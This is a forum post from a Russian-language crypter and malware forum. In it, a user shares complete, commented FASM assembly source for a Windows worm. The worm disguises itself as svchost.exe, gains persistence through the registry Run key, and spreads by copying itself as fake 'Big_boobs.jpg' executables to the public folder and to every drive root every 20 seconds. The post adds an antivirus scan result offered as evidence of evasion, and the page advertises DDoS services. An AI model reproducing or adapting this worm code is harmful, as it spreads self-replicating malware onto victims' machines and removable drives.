FuckAV - Форум о крипторах

Анонимный антивирусный сканер VPN-сервис
[Copi]Team DDoS Service

SEO статьи - блог от создателя FuckAV | KOROVKA.so | Качественный VPN Service MultiVPN - PPTP/OpenVPN/DoubleVPN

Реклама на форуме | Помощь форуму | Аварийный блог

Наш Jabber-сервер расположен по адресу fuckav.in. Добро пожаловать!!!

Вернуться  

Для того, чтобы ответить в теме, необходимо зарегистрироваться.
 
Опции темы Опции просмотра
Prev Предыдущее сообщение   Следующее сообщение Next
Старый 10-12-2013   #1
IBM

xor esp, esp
 
Аватар для IBM

Последняя активность:
3 дн. назад
Регистрация: 30.11.2013
Сообщений: 76
Поблагодарили всего: 160
за это сообщение: 6
По умолчанию Червь на ассемблере [FASM]

Всем привет, написал червя. Прокомментировал каждую строчку, что бы было понятнее. Возможно кому-то пригодится. Распространяется путем копирования в папку PUBLIC и копированием каждые 20 секунд в корень каждого диска. Кому надо, тот еще допилит autorun.inf

Код:
include 'win32ax.inc'

section '.data' data readable writeable
i dd 0
j dd 0
AutoKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0
ValueName db 'svchost',0
hkey dd ?
nWinLength dw ?
IpWinPath db MAX_PATH dup(0)
nBufferLength dw ?
IpBuffer db MAX_PATH dup(0)
nTempLength dw ?
IpTempPath db MAX_PATH dup(0)
IpCommand db '/c copy ', 0
new db 0

section '.code' code readable executable
start:
  jmp @exec
  @exec:
  invoke GetModuleFileName, 0, IpBuffer, nBufferLength ; получаем путь до себя
  invoke GetTempPath, nTempLength, IpTempPath                      ; получаем путь до папки temp
  invoke GetWindowsDirectory, IpWinPath, nWinLength               ; получаем путь до папки Windows
  invoke lstrcat, IpTempPath, 'svchost.exe'         ; прибавляем к пути до Temp название svchost.exe
  invoke lstrcmp, IpBuffer, IpTempPath               ; сравниваем путь до себя и получившийся путь
  cmp eax, 0                    ; если они равны, то мы запущены с именем svchost.exe из папки temp и переходим далее, если не равны то делаем следующий код:
  je @exec_two
  invoke DeleteFile, IpTempPath       ; удаляем предыдущий файл
  invoke CopyFile, IpBuffer, IpTempPath, 1 ; копируемся туда с именем svchost.exe
  invoke ShellExecute, 0, 'open', IpTempPath, NULL, NULL, SW_SHOW ; запускаем svchost
  jmp @exit  ; прыгаем на выход и выходим из процесса
  @exec_two:                                              ; тут мы уже запущены от svchost.exe
  invoke RegCreateKeyEx, HKEY_CURRENT_USER,AutoKey,NULL,NULL,NULL,KEY_ALL_ACCESS,NULL,hkey,NULL  ; открываем ключ автозапуска
  invoke lstrlen,IpTempPath                                    ; получаем длину пути до Temp вместе с svchost.exe
  invoke RegSetValueEx,[hkey],ValueName,NULL,REG_SZ,IpTempPath,eax   ; пишем себя в автозапуск
  invoke RegCloseKey,[hkey]     ; закрываем ключ
  mov [j], 48                     ; кладем в переменную j аскии код 48 ( символ 1 )
  @infect_share:                ; входим а цикл
    mov [i], 48               ; в переменную i кладем аскии код 48 ( символ 1 )
    @copy:
      invoke lstrcpy, new, IpCommand     ; копируем переменную IpCommand в переменную new ( в IpCommand лежит /c copy )
      invoke lstrcat, new, IpTempPath  ; добавляем к переменной new путь до Temp вместе с svchost.exe
      invoke lstrcat, new, ' '                 ; добавляем пробел
      invoke lstrcat, new, '%PUBLIC%\Big_boobs.jpg.'          ; добавляем путь до общей папки с названием Big_boobs.jpg.
      invoke lstrcat, new, j                      ; добавляем в Big.boobs.jpg число  ( десяток )
      invoke lstrcat, new, i                ; добавляем к Big.boobs.jpg%число% еще одно число ( единициу, т.е получается типа такого 38 )
      invoke lstrcat, new, '.exe'               ; добавляем .exe
      invoke ShellExecute, 0, 'open', 'cmd.exe', new, IpWinPath, SW_HIDE ; передаем получившеюся команду в командную строку
      add [i], 1    ; повышаем i на 1
    cmp [i], 58   ; сравниваем i с 58
    jnz @copy  ; если не равно, прыгаем на @copy
    add [j], 1    ; прибавляем в j еще 1
  cmp [j], 58  ; если j не равно 58, то прыгаем на @infect_share
  jnz @infect_share                        ; таким образом мы генерируем файлы пронумерованные от 00 до 99
  @usb:        ; метка для бесконечного цикла заражения всех дисков
  mov [i], 65  ; кладем в i аскии код 65 ( символ A )
  @infect_disks:      ; заражение всех дисков
    mov [j], 48       ; кладем в j аскии код 48 ( символ 1 )
    @generate_filenames:      ; генерируем имена и заражем определенный диск
      invoke lstrcpy, new, i   ; копируем в переменную new символ из аскии кода, который в i ( буква от A - Z )
      invoke lstrcat, new, ':\Big_Boobs.jpg.' ; прибавляем путь куда будем создавать
      invoke lstrcat, new, j        ; нумеруем ( от 0 - 9 ) Все то же самое, что и в заражении общей папки
      invoke lstrcat, new, '.exe'   ; добавляем .exe
      invoke CopyFile, IpBuffer, new, 0  ; копируемся
      add [j], 1      ; повышаем j на один
    cmp [j], 58      ; сравниваем j, если он равен 58 ( символ 9 ), то продолжаем
    jnz @generate_filenames    ; иначе прыгаем обратно и создаем еще одну копию с новым номером
    add [i], 1    ; повышаем i на 1
  cmp [i], 91  ; сравнивиаем i с 91 ( символ Z )
  jnz @infect_disks  ; если не равно, то прыгаем в начало и заражаем следующий диск
  push 20000 ; кладем в стек 20000
  invoke Sleep    ; вызываем Sleep ( 20 секунд )
  jmp @usb ; как прошло 20 секунд, прыгаем на самое начало заражения дисков и делаем процедуру заного
  @exit: ; метка выхода из программы
  invoke MessageBox, 0, 'Go and watch porn! Asshole!', 'PORNO', 0  ; перед выходом из процесса показываем сообщение
  invoke ExitProcess, 0           ; выход из процесса
.end start

Компилятор FASM.

Скан:

Название файла: USB.exe
Размер файла: 3584 байт
Дата сканирования: Tue, 10 Dec 13 12:09:43 -0500
MD5-хэш файла: b6433510b42e6ff873d66a6b2c43920c

Результат: 12 из 36

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: Win32:Small-MOF Trj
AVG: LuaHeur.Win32/DH{A2EPNg}
Avira: TR/ATRAPS.Gen Trojan!
Bitdefender/BullGuard: Trojan.Generic.10073787
BullGuard Internet Security 2013: Trojan.Generic.10073787
Comodo: OK
Dr.Web: Trojan.MulDrop5.4888
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: Malware detected
Fortinet 5: OK
F-Prot: OK
F-Secure 2014: OK
G Data: Virus: Trojan.Generic.10073787 (Engine A)

IKARUS: Trojan.Win32.Swisyn
Immunet/ClamAV: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: HEUR:Trojan.Win32.Generic
McAfee Total Protection 2013: OK
Microsoft Security Essentials: Malware detected
NANO: OK
NOD32: @Trojan.Win32/Agent.VLT
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: OK
VBA: OK
VIPRE Internet Security 2013: OK
Virit: OK

Scan report generated by Scanner.FuckAV.ru
IBM вне форума  
Сказали спасибо:
fatal (18-12-2013), Dark Koder (11-12-2013), dzhoka (10-12-2013), denis187500 (10-12-2013), GK104 (10-12-2013), POCT (10-12-2013)
Для того, чтобы ответить в теме, необходимо зарегистрироваться.

Метки
fasm, invoke, iptemppath, ассемблере, червь


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужен червь kxp Помощь 2 14-11-2013 21:11
FASM Packer Wazzup Assembler 13 15-07-2013 14:57
Червь W32/Fizzer-mm Andres N. Корзина 1 10-01-2011 19:07
Пользователей Skype атакует интернет-червь W32.Skyhoo.Worm _Stealer_ Новости 2 14-05-2010 11:45

Часовой пояс GMT +3, время: 16:59.



Powered by vBulletin® Copyright ©2000 - 2014, Jelsoft Enterprises Ltd. Перевод: zCarot
Други: SEO блог Deymos'a| ProLogic.Su| DServers.ru| Форум веб-мастеров